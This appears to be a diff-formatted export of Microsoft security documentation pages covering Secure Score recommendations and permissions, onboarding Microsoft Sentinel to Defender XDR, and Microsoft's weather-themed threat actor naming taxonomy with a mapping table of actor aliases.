--- Ensure that only organizationally managed/approved public groups exist.-- Ensure Sign-in frequency is enabled and browser sessions aren't persistent for Administrative users.-- Ensure Administrative accounts are separate, unassigned, and cloud-only.-- Ensure third party integrated applications aren't allowed.-- Ensure the admin consent workflow is enabled.-- Ensure DLP policies are enabled for Microsoft Teams.-- Ensure that SPF records are published for all Exchange Domains.-- Ensure Microsoft Defender for Cloud Apps is Enabled.-- Ensure mobile device management policies are set to require advanced security configurations to protect from basic internet attacks.-- Ensure that mobile device password reuse is prohibited.-- Ensure that mobile devices are set to never expire passwords.-- Ensure that users can't connect from devices that are jail broken or rooted.-- Ensure mobile devices are set to wipe on multiple sign-in failures to prevent brute force compromise.-- Ensure that mobile devices require a minimum password length to prevent brute force attacks.-- Ensure devices lock after a period of inactivity to prevent unauthorized access.-- Ensure that mobile device encryption is enabled to prevent unauthorized access to mobile data.-- Ensure that mobile devices require complex passwords (Type = Alphanumeric).-- Ensure that mobile devices require complex passwords (Simple Passwords = Blocked).-- Ensure that devices connecting have AV and a local firewall enabled.-- Ensure mobile device management policies are required for email profiles.-- Ensure mobile devices require the use of a password.-
-> [!NOTE]
-> To view the new Defender for Cloud Apps recommendations, the Office 365 connector in Microsoft Defender for Cloud Apps must be toggled on via the App connectors settings page. For more information, see, [How to connect Office 365 to Defender for Cloud Apps](/defender-cloud-apps/connect-office-365#how-to-connect-office-365-to-defender-for-cloud-apps).
-
-## September 2022
-
-New Microsoft Defender for Office 365 recommendations for anti-phishing policies are now available as Secure Score improvement actions:
--- Set the phishing email level threshold at 2 or higher.-- Enable impersonated user protection.-- Enable impersonated domain protection.-- Ensure that mailbox intelligence is enabled.-- Ensure that intelligence for impersonation protection is enabled.-- Quarantine messages that are detected from impersonated users.-- Quarantine messages that are detected from impersonated domains.-- Move messages that are detected as impersonated users by mailbox intelligence.-- Enable the 'show first contact safety tip' option.-- Enable the user impersonation safety tip.-- Enable the domain impersonation safety tip.-- Enable the user impersonation unusual characters safety tip.-
-A New SharePoint Online recommendation is now available as a Secure Score improvement action:
--- Sign out inactive users in SharePoint Online.-
-## August 2022
-
-New Microsoft Purview Information Protection recommendations are now available as Secure Score improvement actions:
--- **Labeling**
- - Extend Microsoft 365 sensitivity labeling to assets in Azure Purview data map.
- - Ensure Autolabeling data classification policies are set up and used.
- - Publish Microsoft 365 sensitivity label data classification policies.
- - Create Data Loss Prevention (DLP) policies.
-
-New Microsoft Defender for Office 365 recommendations are now available as Secure Score improvement actions:
--- **Anti-spam - Inbound policy**
- - Set the email bulk complaint level (BCL) threshold to 6 or lower.
- - Set action to take on spam detection.
- - Set action to take on high confidence spam detection.
- - Set action to take on phishing detection.
- - Set action to take on high confidence phishing detection.
- - Set action to take on bulk spam detection.
- - Retain spam in quarantine for 30 days.
- - Ensure spam safety tips are enabled.
- - Ensure that no sender domains are in the allowed domains list in anti-spam policies (replaces "Ensure that there are no sender domains allowed for Anti-spam policies" to extend functionality also for specific senders).
--- **Anti-spam - Outbound policy**
- - Set maximum number of external recipients that a user can email per hour.
- - Set maximum number of internal recipients that a user can send to within an hour.
- - Set a daily message limit.
- - Block users who reached the message limit.
- - Set Automatic email forwarding rules to be system controlled.
--- **Anti-spam - Connection filter**
- - Don't add allowed IP addresses in the connection filter policy.
-
-## June 2022
--- New Microsoft Defender for Endpoint and Microsoft Defender Vulnerability Management recommendations are now available as Secure Score improvement actions:-
- - Disallow offline access to shares.
- - Remove share write permission set to **Everyone**.
- - Remove shares from the root folder.
- - Set folder access-based enumeration for shares.
- - Update Microsoft Defender for Endpoint core components.
--- A new Microsoft Defender for Identity recommendation is available as a Secure Score improvement action:-
- - Resolve unsecure domain configurations.
--- A new [app governance](/defender-cloud-apps/app-governance-manage-app-governance) recommendation is now available as a Secure Score improvement action:-
- - Regulate apps with consent from priority accounts.
--- New Salesforce and ServiceNow recommendations are now available as Secure Score improvement actions for Microsoft Defender for Cloud Apps customers. For more information, see [SaaS Security Posture Management overview](https://aka.ms/saas_security_posture_management).-
-> [!NOTE]
-> Salesforce and ServiceNow controls are now available in public preview.
-
-## April 2022
--- Turn on user authentication for remote connections.-
-## December 2021
--- Turn on Safe Attachments in block mode.-- Prevent sharing Exchange Online calendar details with external users.-- Turn on Safe Documents for Office clients.-- Turn on the common attachments filter setting for anti-malware policies.-- Ensure that there are no sender domains allowed for anti-spam policies.-- Create Safe Links policies for email messages.-- Create zero-hour auto purge policies for malware.-- Turn on Microsoft Defender for Office 365 in SharePoint, OneDrive, and Microsoft Teams.-- Create zero-hour auto purge policies for phishing messages.-- Create zero-hour auto purge policies for spam messages.-- Block abuse of exploited vulnerable signed drivers.-- Turn on scanning of removable drives during a full scan.-
-## We want to hear from you
-
-If you have any issues, let us know by posting in the [Security, Privacy & Compliance](https://techcommunity.microsoft.com/t5/Security-Privacy-Compliance/bd-p/security_privacy) community. We're monitoring the community to provide help.
-
-## Related resources
--- [Assess your security posture](microsoft-secure-score-improvement-actions.md)-- [Track your Microsoft Secure Score history and meet goals](microsoft-secure-score-history-metrics-trends.md)-- [What's coming](microsoft-secure-score-whats-coming.md)
security Microsoft Secure Score https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-secure-score.md
- Title: Microsoft Secure Score
-description: Describes Microsoft Secure Score in the Microsoft Defender portal, how to improve your security posture, and what security admins can expect.
-
- - NOCSH
------ m365-security-- Adm_TOC-- tier2-
- - MOE150
- - MET150
Previously updated : 08/03/2023--
-# Microsoft Secure Score
--
-Microsoft Secure Score is a measurement of an organization's security posture, with a higher number indicating more recommended actions taken. It can be found at [Microsoft Secure Score](https://security.microsoft.com/securescore) in the [Microsoft Defender portal](microsoft-365-defender-portal.md).
-
-Following the Secure Score recommendations can protect your organization from threats. From a centralized dashboard in the Microsoft Defender portal, organizations can monitor and work on the security of their Microsoft 365 identities, apps, and devices.
-
-Secure Score helps organizations:
--- Report on the current state of the organization's security posture.-- Improve their security posture by providing discoverability, visibility, guidance, and control.-- Compare with benchmarks and establish key performance indicators (KPIs).-
-Watch this video for a quick overview of Secure score.
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWUPrP]
-
-Organizations gain access to robust visualizations of metrics and trends, integration with other Microsoft products, score comparison with similar organizations, and much more. The score can also reflect when non-Microsoft solutions addressed recommended actions.
--
-## How it works
-
-You're given points for the following actions:
--- Configuring recommended security features-- Doing security-related tasks-- Addressing the recommended action with a non-Microsoft application or software, or an alternate mitigation-
-Some recommended actions only give points when fully completed. Some give partial points if they're completed for some devices or users. If you can't or don't want to enact one of the recommended actions, you can choose to accept the risk or remaining risk.
-
-If you have a license for one of the supported Microsoft products, then you'll see recommendations for those products. We show you the full set of possible recommendations for a product, regardless of license edition, subscription, or plan. This way, you can understand security best practices and improve your score. Your absolute security posture, represented by Secure Score, stays the same no matter what licenses your organization owns for a specific product. Keep in mind that security should be balanced with usability, and not every recommendation can work for your environment.
-
-Your score is updated in real time to reflect the information presented in the visualizations and recommended action pages. Secure Score also syncs daily to receive system data about your achieved points for each action.
-
-> [!NOTE]
-> For Microsoft Teams and Microsoft Entra related recommendations, the recommendation state will get updated when changes occur in the configuration state. In addition, the recommendation state is refreshed once a month or once a week, respectively.
-
-### Key scenarios
--- [Check your current score](microsoft-secure-score-improvement-actions.md#check-your-current-score)-- [Compare your score to organizations like yours](microsoft-secure-score-history-metrics-trends.md#compare-your-score-to-organizations-like-yours)-- [View recommended actions and decide an action plan](microsoft-secure-score-improvement-actions.md#take-action-to-improve-your-score)-- [Initiate work flows to investigate or implement](microsoft-secure-score-improvement-actions.md#view-recommended-action-details)-
-### How recommended actions are scored
-
-Each recommended action is worth 10 points or less, and most are scored in a binary fashion. If you implement the recommended action, like create a new policy or turn on a specific setting, you get 100% of the points. For other recommended actions, points are given as a percentage of the total configuration.
-
-For example, a recommended action states you get 10 points by protecting all your users with multi-factor authentication. You only have 50 of 100 total users protected, so you'd get a partial score of five points (50 protected / 100 total * 10 max pts = 5 pts).
-
-### Products included in Secure Score
-
-Currently there are recommendations for the following products:
--- App governance-- Microsoft Entra ID-- Citrix ShareFile-- Microsoft Defender for Endpoint-- Microsoft Defender for Identity-- Microsoft Defender for Office-- Docusign-- Exchange Online-- GitHub-- Microsoft Defender for Cloud Apps-- Microsoft Information Protection-- Microsoft Teams-- Okta-- Salesforce-- ServiceNow-- SharePoint Online-- Zoom-
-Recommendations for other security products are coming soon. The recommendations won't cover all the attack surfaces associated with each product, but they're a good baseline. You can also mark the recommended actions as covered by a third party or alternate mitigation.
-
-### Security defaults
-
-Microsoft Secure Score has updated recommended actions to support [security defaults in Microsoft Entra ID](/azure/active-directory/fundamentals/concept-fundamentals-security-defaults), which make it easier to help protect your organization with pre-configured security settings for common attacks.
-
-If you turn on security defaults, you'll be awarded full points for the following recommended actions:
--- Ensure all users can complete multi-factor authentication for secure access (9 points)-- Require MFA for administrative roles (10 points)-- Enable policy to block legacy authentication (7 points)-
-> [!IMPORTANT]
-> Security defaults include security features that provide similar security to the "sign-in risk policy" and "user risk policy" recommended actions. Instead of setting up these policies on top of the security defaults, we recommend updating their statuses to "Resolved through alternative mitigation."
-
-## Secure Score permissions
-
-<a name='manage-permissions-with-microsoft-365-defender-unified-role-based-access-controlrbac'></a>
-
-### Manage permissions with Microsoft Defender XDR Unified role-based access control(RBAC)
-
-With [Microsoft Defender XDR Unified role-based access control(RBAC)](manage-rbac.md), you can create custom roles with specific permissions for Secure Score. This allows you to control which users have access to Secure Score data, the products for which they'll see Secure Score data (for example, Microsoft Defender for Endpoint) and their permission level to the data.
-
-You can also manage user permissions to access Secure Score data from additional data sources, such as the other products supported by Secure Score, for more information, see [Products included in Secure Score](#products-included-in-secure-score). You can view the Secure Score data from the additional data sources either alone or alongside the other data sources.
-
-To start using Microsoft Defender XDR Unified RBAC to manage your Secure Score permissions, see [Microsoft Defender XDR Unified role-based access control(RBAC)](manage-rbac.md).
-
-> [!NOTE]
-> Currently, the model is only supported in the Microsoft Defender portal. If you want to use GraphAPI (for example, for internal dashboards or Defender for Identity Secure Score) you should continue to use Microsoft Entra roles. Support GraphAPI is planned at a later date.
-
-<a name='azure-active-directory-global-roles-permissions'></a>
-
-### Microsoft Entra global roles permissions
-
-Microsoft Entra global roles (for example, Global Administrator) can still be used to access Secure Score. Users who have the supported Microsoft Entra global roles, but aren't assigned to a custom role in Microsoft Defender XDR Unified RBAC, will continue to have access to view (and manage where permitted) Secure Score data as outlined:
-
-The following roles have read and write access and can make changes, directly interact with Secure Score, and can assign read-only access to other users:
--- Global administrator-- Security administrator-- Exchange administrator-- SharePoint administrator-
-The following roles have read-only access and aren't able to edit status or notes for a recommended action, edit score zones, or edit custom comparisons:
--- Helpdesk administrator-- User administrator-- Service support administrator-- Security reader-- Security operator-- Global reader-
-> [!NOTE]
-> If you want to follow the principle of least privilege access (where you only give users and groups the permissions, they need to do their job), Microsoft recommends that you remove any existing elevated Microsoft Entra global roles for users and/or security groups assigned a custom role with Secure Score permissions. This will ensure that the custom Microsoft Defender XDR Unified RBAC roles will take effect.
-
-## Risk awareness
-
-Microsoft Secure Score is a numerical summary of your security posture based on system configurations, user behavior, and other security-related measurements. It isn't an absolute measurement of how likely your system or data will be breached. Rather, it represents the extent to which you have adopted security controls in your Microsoft environment that can help offset the risk of being breached. No online service is immune from security breaches, and secure score shouldn't be interpreted as a guarantee against security breach in any manner.
-
-## We want to hear from you
-
-If you have any issues, let us know by posting in the [Security, Privacy & Compliance](https://techcommunity.microsoft.com/t5/Security-Privacy-Compliance/bd-p/security_privacy) community. We're monitoring the community and will provide help.
-
-## Related resources
--- [Assess your security posture](microsoft-secure-score-improvement-actions.md)-- [Track your Microsoft Secure Score history and meet goals](microsoft-secure-score-history-metrics-trends.md)-- [What's coming](microsoft-secure-score-whats-coming.md)-- [What's new](microsoft-secure-score-whats-new.md)
security Microsoft Sentinel Onboard https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-sentinel-onboard.md
- Title: Connect Microsoft Sentinel to Microsoft Defender XDR (preview)
-description: Learn how to connect your Microsoft Sentinel environment to Microsoft Defender XDR to unify your security operations.
-
- - NOCSH
------ m365-security-- m365solution-getstarted-- highpri-- tier1-- usx-security--- MOE150-- MET150
-appliesto:
- - Microsoft Defender XDR
- - Microsoft Sentinel in the Microsoft Defender portal
Previously updated : 04/03/2024--
-# Connect Microsoft Sentinel to Microsoft Defender XDR (preview)
-
-Microsoft Sentinel is available as part of the public preview for the unified security operations platform in the Microsoft Defender portal. When you onboard Microsoft Sentinel to the Microsoft Defender portal, you unify capabilities with Microsoft Defender XDR like incident management and advanced hunting. Reduce tool switching and build a more context-focused investigation that expedites incident response and stops breaches faster. For more information, see:
--- [Microsoft Sentinel in the Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2263690)-- [Unified security operations platform with Microsoft Sentinel and Defender XDR](https://aka.ms/unified-soc-announcement)-
-> [!IMPORTANT]
-> Information in this article relates to a prerelease product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-## Prerequisites
-
-Before you begin, review the feature documentation to understand the product changes and limitations:
- - [Microsoft Sentinel in the Microsoft Defender portal](/azure/sentinel/microsoft-sentinel-defender-portal)
- - [Advanced hunting in the Microsoft Defender portal](advanced-hunting-microsoft-defender.md)
- - [Automation with the unified security operations platform](/azure/sentinel/automation#automation-with-the-unified-security-operations-platform)
-
-The Microsoft Defender portal supports a single Microsoft Entra tenant and the connection to one workspace at a time. In the context of this article, a workspace is a Log Analytics workspace with Microsoft Sentinel enabled.
-
-To onboard and use Microsoft Sentinel in the Microsoft Defender portal, you must have the following resources and access:
--- A Log Analytics workspace that has Microsoft Sentinel enabled-- The data connector for Microsoft Defender XDR (formerly named Microsoft 365 Defender) enabled in Microsoft Sentinel for incidents and alerts-- Access to Microsoft Defender XDR in the Defender portal-- Microsoft Defender XDR onboarded to the Microsoft Entra tenant-- An Azure account with the appropriate roles to onboard, use, and create support requests for Microsoft Sentinel in the Defender portal. The following table highlights some of the key roles needed.-
- |Task |Azure built-in role required |Scope |
- ||||
- |Connect or disconnect a workspace with Microsoft Sentinel enabled|[Owner](/azure/role-based-access-control/built-in-roles#owner) or </br>[User Access Administrator](/azure/role-based-access-control/built-in-roles#user-access-administrator) and [Microsoft Sentinel Contributor](/azure/role-based-access-control/built-in-roles#microsoft-sentinel-contributor) |- Subscription for Owner or User Access Administrator roles </br></br>- Subscription, resource group, or workspace resource for Microsoft Sentinel Contributor |
- |View Microsoft Sentinel in the Defender portal|[Microsoft Sentinel Reader](/azure/role-based-access-control/built-in-roles#microsoft-sentinel-reader) |Subscription, resource group, or workspace resource |
- |Query Sentinel data tables or view incidents |[Microsoft Sentinel Reader](/azure/role-based-access-control/built-in-roles#microsoft-sentinel-reader) or a role with the following actions:</br>- Microsoft.OperationalInsights/workspaces/read</br>- Microsoft.OperationalInsights/workspaces/query/read</br>- Microsoft.SecurityInsights/Incidents/read</br>- Microsoft.SecurityInsights/incidents/comments/read</br>- Microsoft.SecurityInsights/incidents/relations/read</br>- Microsoft.SecurityInsights/incidents/tasks/read|Subscription, resource group, or workspace resource |
- |Take investigative actions on incidents |[Microsoft Sentinel Contributor](/azure/role-based-access-control/built-in-roles#microsoft-sentinel-contributor) or a role with the following actions:</br>- Microsoft.OperationalInsights/workspaces/read</br>- Microsoft.OperationalInsights/workspaces/query/read</br>- Microsoft.SecurityInsights/incidents/read</br>- Microsoft.SecurityInsights/incidents/write</br>- Microsoft.SecurityInsights/incidents/comments/read</br>- Microsoft.SecurityInsights/incidents/comments/write</br>- Microsoft.SecurityInsights/incidents/relations/read</br>- Microsoft.SecurityInsights/incidents/relations/write</br>- Microsoft.SecurityInsights/incidents/tasks/read</br>- Microsoft.SecurityInsights/incidents/tasks/write |Subscription, resource group, or workspace resource |
- |Create a support request |[Owner](/azure/role-based-access-control/built-in-roles#owner) or </br> [Contributor](/azure/role-based-access-control/built-in-roles#contributor) or </br> [Support request contributor](/azure/role-based-access-control/built-in-roles#support-request-contributor) or a custom role with Microsoft.Support/*|Subscription |
-
- After you connect Microsoft Sentinel to the Defender portal, your existing Azure role-based access control (RBAC) permissions allow you to work with the Microsoft Sentinel features that you have access to. Continue to manage roles and permissions for your Microsoft Sentinel users from the Azure portal. Any Azure RBAC changes are reflected in the Defender portal. For more information about Microsoft Sentinel permissions, see [Roles and permissions in Microsoft Sentinel | Microsoft Learn](/azure/sentinel/roles) and [Manage access to Microsoft Sentinel data by resource | Microsoft Learn](/azure/sentinel/resource-context-rbac).
-
-## Onboard Microsoft Sentinel
-
-To connect a workspace that has Microsoft Sentinel enabled to Defender XDR, complete the following steps:
-
-1. Go to the [Microsoft Defender portal](https://security.microsoft.com/) and sign in.
-1. In Microsoft Defender XDR, select **Overview**.
-1. Select **Connect a workspace**.
-1. Choose the workspace you want to connect and select **Next**.
-1. Read and understand the product changes associated with connecting your workspace. These changes include:
-
- - Log tables, queries, and functions in the Microsoft Sentinel workspace are also available in advanced hunting within Defender XDR.
- - The Microsoft Sentinel Contributor role is assigned to the Microsoft Threat Protection and WindowsDefenderATP apps within the subscription.
- - Active [Microsoft security incident creation rules](/azure/sentinel/create-incidents-from-alerts#using-microsoft-security-incident-creation-analytics-rules) are deactivated to avoid duplicate incidents. This change only applies to incident creation rules for Microsoft alerts and not to other analytics rules.
- - All alerts related to Defender XDR products are streamed directly from the main Defender XDR data connector to ensure consistency. Make sure you have incidents and alerts from this connector turned on in the workspace.
-
-1. Select **Connect**.
-
-After your workspace is connected, the banner on the **Overview** page shows that your unified security information and event management (SIEM) and extended detection and response (XDR) is ready. The **Overview** page is updated with new sections that include metrics from Microsoft Sentinel like the number of data connectors and automation rules.
-
-## Explore Microsoft Sentinel features in the Defender portal
-
-After you connect your workspace to the Defender portal, **Microsoft Sentinel** is on the left-hand side navigation pane. Pages like **Overview**, **Incidents**, and **Advanced Hunting** have unified data from Microsoft Sentinel and Defender XDR. For more information about the unified capabilities and differences between portals, see [Microsoft Sentinel in the Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2263690).
-
-Many of the existing Microsoft Sentinel features are integrated into the Defender portal. For these features, notice that the experience between Microsoft Sentinel in the Azure portal and Defender portal are similar. Use the following articles to help you start working with Microsoft Sentinel in the Defender portal. When using these articles, keep in mind that your starting point in this context is the [Defender portal](https://security.microsoft.com/) instead of the Azure portal.
--- Search
- - [Search across long time spans in large datasets](/azure/sentinel/search-jobs?tabs=defender-portal)
- - [Restore archived logs from search](/azure/sentinel/restore)
-- Threat management
- - [Visualize and monitor your data by using workbooks](/azure/sentinel/monitor-your-data?tabs=defender-portal)
- - [Conduct end-to-end threat hunting with Hunts](/azure/sentinel/hunts)
- - [Use hunting bookmarks for data investigations](/azure/sentinel/bookmarks)
- - [Use hunting Livestream in Microsoft Sentinel to detect threat](/azure/sentinel/livestream)
- - [Hunt for security threats with Jupyter notebooks](/azure/sentinel/notebooks-hunt)
- - [Add indicators in bulk to Microsoft Sentinel threat intelligence from a CSV or JSON file](/azure/sentinel/indicators-bulk-file-import?tabs=defender-portal)
- - [Work with threat indicators in Microsoft Sentinel](/azure/sentinel/work-with-threat-indicators?tabs=defender-portal)
- - [Understand security coverage by the MITRE ATT&CK framework](/azure/sentinel/mitre-coverage)
-- Content management
- - [Discover and manage Microsoft Sentinel out-of-the-box content](/azure/sentinel/sentinel-solutions-deploy?tabs=defender-portal)
- - [Microsoft Sentinel content hub catalog](/azure/sentinel/sentinel-solutions-catalog)
- - [Deploy custom content from your repository](/azure/sentinel/ci-cd)
-- Configuration
- - [Find your Microsoft Sentinel data connector](/azure/sentinel/data-connectors-reference)
- - [Create custom analytics rules to detect threats](/azure/sentinel/detect-threats-custom?tabs=defender-portal)
- - [Work with near-real-time (NRT) detection analytics rules in Microsoft Sentinel](/azure/sentinel/create-nrt-rules?tabs=defender-portal)
- - [Create watchlists](/azure/sentinel/watchlists-create?tabs=defender-portal)
- - [Manage watchlists in Microsoft Sentinel](/azure/sentinel/watchlists-manage)
- - [Create automation rules](/azure/sentinel/create-manage-use-automation-rules)
- - [Create and customize Microsoft Sentinel playbooks from content templates](/azure/sentinel/use-playbook-templates)
-
-Find Microsoft Sentinel settings in the Defender portal under **System** > **Settings** > **Microsoft Sentinel**.
-
-## Offboard Microsoft Sentinel
-
-You can only have one workspace connected to the Defender portal at a time. If you want to connect to a different workspace that has Microsoft Sentinel enabled, disconnect the current workspace and connect the other workspace.
-
-1. Go to the [Microsoft Defender portal](https://security.microsoft.com/) and sign in.
-1. In the Defender portal, under **System**, select **Settings** > **Microsoft Sentinel**.
-1. On the **Workspaces** page, select the connected workspace and **Disconnect workspace**.
-1. Confirm your selection.
-
- When your workspace is disconnected, the **Microsoft Sentinel** section is removed from the left-hand side navigation of the Defender portal. Data from Microsoft Sentinel is no longer included on the Overview page.
-
-If you want to connect to a different workspace, from the **Workspaces** page, select the workspace and **Connect a workspace**.
-
-## Related content
--- [Microsoft Sentinel in the Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2263690)-- [Advanced hunting in the Microsoft Defender portal](https://go.microsoft.com/fwlink/p/?linkid=2264410)-- [Automatic attack disruption in Microsoft Defender XDR](automatic-attack-disruption.md)-- [Investigate incidents in Microsoft Defender XDR](investigate-incidents.md)
security Microsoft Threat Actor Naming https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-threat-actor-naming.md
- Title: How Microsoft names threat actors-
-description: Learn how Microsoft names threat actors and how to use the naming convention to identify associated intelligence.
-keywords: security, threat actor, security intelligence, naming convention, taxonomy, weather, threat actor naming, motivation, attribution, nation-state, financially motivated, private sector offensive actor, influence operations, groups in development, DEV-, nation state
-
-ms.sitesec: library
------ m365-security-- tier2- Previously updated : 04/17/2024--
-# How Microsoft names threat actors
-
-Microsoft shifted to a new naming taxonomy for threat actors aligned with the theme of weather. We intend to bring better clarity to customers and other security researchers with the nex taxonomy. We offer a more organized, articulate, and easy way to reference threat actors so that organizations can better prioritize and protect themselves and aid security researchers already confronted with an overwhelming amount of threat intelligence data.
--
-Microsoft categorizes threat actors into five key groups:
-
-**Nation-state actors:** cyber operators acting on behalf of or directed by a nation/state-aligned program, irrespective of whether for espionage, financial gain, or retribution. Microsoft observed that most nation state actors continue to focus operations and attacks on government agencies, intergovernmental organizations, nongovernmental organizations, and think tanks for traditional espionage or surveillance objectives.
-
-**Financially motivated actors:** cyber campaigns/groups directed by a criminal organization/person with motivations of financial gain and are not associated with high confidence to a known non-nation state or commercial entity. This category includes ransomware operators, business email compromise, phishing, and other groups with purely financial or extortion motivations.
-
-**Private sector offensive actors (PSOAs):** cyber activity led by commercial actors that are known/legitimate legal entities, that create and sell cyberweapons to customers who then select targets and operate the cyberweapons. These tools were observed targeting and surveilling dissidents, human rights defenders, journalists, civil society advocates, and other private citizens, threatening many global human rights efforts.
-
-**Influence operations:** information campaigns communicated online or offline in a manipulative fashion to shift perceptions, behaviors, or decisions by target audiences to further a group or a nation's interests and objectives.
-
-**Groups in development:** a temporary designation given to an unknown, emerging, or developing threat activity. This designation allows Microsoft to track a group as a discrete set of information until we can reach high confidence about the origin or identity of the actor behind the operation. Once criteria are met, a group in development is converted to a named actor or merged into existing names.
-
-In our new taxonomy, a weather event or *family name* represents one of the above categories. For nation-state actors, we have assigned a family name to a country/region of origin tied to attribution, like Typhoon indicates origin or attribution to China. For other actors, the family name represents a motivation. For example, Tempest indicates financially motivated actors.
-
-Threat actors within the same weather family are given an adjective to distinguish actor groups with distinct tactics, techniques, and procedures (TTPs), infrastructure, objectives, or other identified patterns. For groups in development, we use a temporary designation of Storm and a four-digit number where there is a newly discovered, unknown, emerging, or developing cluster of threat activity.
-
-The table shows how the new family names map to the threat actors that we track.
-
-|Actor category|Type|Family name|
-|::|::|::|
-|Nation-state|China<br>Iran<br>Lebanon<br>North Korea<br>Russia<br>South Korea<br>Turkey<br>Vietnam|Typhoon<br>Sandstorm<br>Rain<br>Sleet<br>Blizzard<br>Hail<br>Dust<br>Cyclone|
-|Financially motivated|Financially motivated|Tempest|
-|Private sector offensive actors|PSOAs|Tsunami|
-|Influence operations|Influence operations|Flood|
-|Groups in development|Groups in development|Storm|
-
-Use the following reference table to understand how our previously publicly disclosed old threat actor names translate to our new taxonomy.
-
-|Threat actor name|Previous name|Origin/Threat|Other names|
-|::|::|::|::|
-|Aqua Blizzard|ACTINIUM|Russia|UNC530, Primitive Bear, Gamaredon|
-|Blue Tsunami||Private sector offensive actor|Black Cube|
-|Brass Typhoon|BARIUM|China|APT41|
-|Cadet Blizzard|DEV-0586|Russia||
-|Camouflage Tempest|TAAL|Financially motivated|FIN6, Skeleton Spider|
-|Canvas Cyclone|BISMUTH|Vietnam|APT32, OceanLotus|
-|Caramel Tsunami|SOURGUM|Private sector offensive actor|Candiru|
-|Carmine Tsunami|DEV-0196|Private sector offensive actor|QuaDream|
-|Charcoal Typhoon|CHROMIUM|China|ControlX|
-|Cinnamon Tempest|DEV-0401|Financially motivated|Emperor Dragonfly, Bronze Starlight|
-|Circle Typhoon|DEV-0322|China||
-|Citrine Sleet|DEV-0139, DEV-1222|North Korea|AppleJeus, Labyrinth Chollima, UNC4736|
-|Cotton Sandstorm|DEV-0198 (NEPTUNIUM)|Iran|Vice Leaker|
-|Crimson Sandstorm|CURIUM|Iran|TA456, Tortoise Shell|
-|Cuboid Sandstorm|DEV-0228|Iran||
-|Denim Tsunami|KNOTWEED|Private sector offensive actor|DSIRF|
-|Diamond Sleet|ZINC|North Korea|Labyrinth Chollima, Lazarus|
-|Emerald Sleet|THALLIUM|North Korea|Kimsuky, Velvet Chollima|
-|Flax Typhoon|Storm-0919|China|Ethereal Panda|
-|Forest Blizzard|STRONTIUM|Russia|APT28, Fancy Bear|
-|Ghost Blizzard|BROMINE|Russia|Energetic Bear, Crouching Yeti|
-|Gingham Typhoon|GADOLINIUM|China|APT40, Leviathan, TEMP.Periscope, Kryptonite Panda|
-|Granite Typhoon|GALLIUM|China||
-|Gray Sandstorm|DEV-0343|Iran||
-|Hazel Sandstorm|EUROPIUM|Iran|Cobalt Gypsy, APT34, OilRig|
-|Jade Sleet|Storm-0954|North Korea|TraderTraitor, UNC4899|
-|Lace Tempest|DEV-0950|Financially motivated|FIN11, TA505|
-|Lemon Sandstorm|RUBIDIUM|Iran|Fox Kitten, UNC757, PioneerKitten|
-|Lilac Typhoon|DEV-0234|China||
-|Manatee Tempest|DEV-0243|Financially motivated|EvilCorp, UNC2165, Indrik Spider|
-|Mango Sandstorm|MERCURY|Iran|MuddyWater, SeedWorm, Static Kitten, TEMP.Zagros|
-|Marbled Dust|SILICON|T├╝rkiye|Sea Turtle|
-|Marigold Sandstorm|DEV-0500|Iran|Moses Staff|
-|Midnight Blizzard|NOBELIUM|Russia|APT29, Cozy Bear|
-|Mint Sandstorm|PHOSPHORUS|Iran|APT35, Charming Kitten|
-|Mulberry Typhoon|MANGANESE|China|APT5, Keyhole Panda, TABCTENG|
-|Mustard Tempest|DEV-0206|Financially motivated|Purple Vallhund|
-|Night Tsunami|DEV-0336|Private sector offensive actor|NSO Group|
-|Nylon Typhoon|NICKEL|China|ke3chang, APT15, Vixen Panda|
-|Octo Tempest|Storm-0875|Financially motivated|0ktapus, Scattered Spider, UNC3944|
-|Onyx Sleet|PLUTONIUM|North Korea|Silent Chollima, Andariel, DarkSeoul|
-|Opal Sleet|OSMIUM|North Korea|Konni|
-|Peach Sandstorm|HOLMIUM|Iran|APT33, Refined Kitten|
-|Pearl Sleet|DEV-0215 (LAWRENCIUM)|North Korea||
-|Periwinkle Tempest|DEV-0193|Financially motivated|Wizard Spider, UNC2053|
-|Phlox Tempest|DEV-0796|Financially motivated|ClickPirate, Chrome Loader, Choziosi loader|
-|Pink Sandstorm|AMERICIUM|Iran|Agrius, Deadwood, BlackShadow, SharpBoys|
-|Pistachio Tempest|DEV-0237|Financially motivated|FIN12|
-|Plaid Rain|POLONIUM|Lebanon||
-|Pumpkin Sandstorm|DEV-0146|Iran|ZeroCleare|
-|Raspberry Typhoon|RADIUM|China|APT30, LotusBlossom|
-|Ruby Sleet|CERIUM|North Korea||
-|Salmon Typhoon|SODIUM|China|APT4, Maverick Panda|
-|Sangria Tempest|ELBRUS|Financially motivated|Carbon Spider, FIN7|
-|Sapphire Sleet|COPERNICIUM|North Korea|Genie Spider, BlueNoroff|
-|Seashell Blizzard|IRIDIUM|Russia|APT44, Sandworm|
-|Secret Blizzard|KRYPTON|Russia|Venomous Bear, Turla, Snake|
-|Silk Typhoon|HAFNIUM|China||
-|Smoke Sandstorm|BOHRIUM|Iran||
-|Spandex Tempest|CHIMBORAZO|Financially motivated|TA505|
-|Star Blizzard|SEABORGIUM|Russia|Callisto, Reuse Team|
-|Storm-0062||China|DarkShadow, Oro0lxy|
-|Storm-0133||Iran|LYCEUM, HEXANE|
-|Storm-0216||Financially motivated|Twisted Spider, UNC2198|
-|Storm-0257||Group in development|UNC1151|
-|Storm-0324||Financially motivated|TA543, Sagrid|
-|Storm-0381||Financially motivated||
-|Storm-0530||North Korea|H0lyGh0st|
-|Storm-0539||Financially motivated||
-|Storm-0558||China||
-|Storm-0569||Financially motivated||
-|Storm-0587||Russia|SaintBot, Saint Bear, TA471|
-|Storm-0744||Financially motivated||
-|Storm-0784||Iran||
-|Storm-0829||Group in development|Nwgen Team|
-|Storm-0835||Group in development|EvilProxy|
-|Storm-0842||Iran||
-|Storm-0861||Iran||
-|Storm-0867||Egypt|Caffeine|
-|Storm-0971||Financially motivated|(Merged into Octo Tempest)|
-|Storm-0978||Group in development|RomCom, Underground Team|
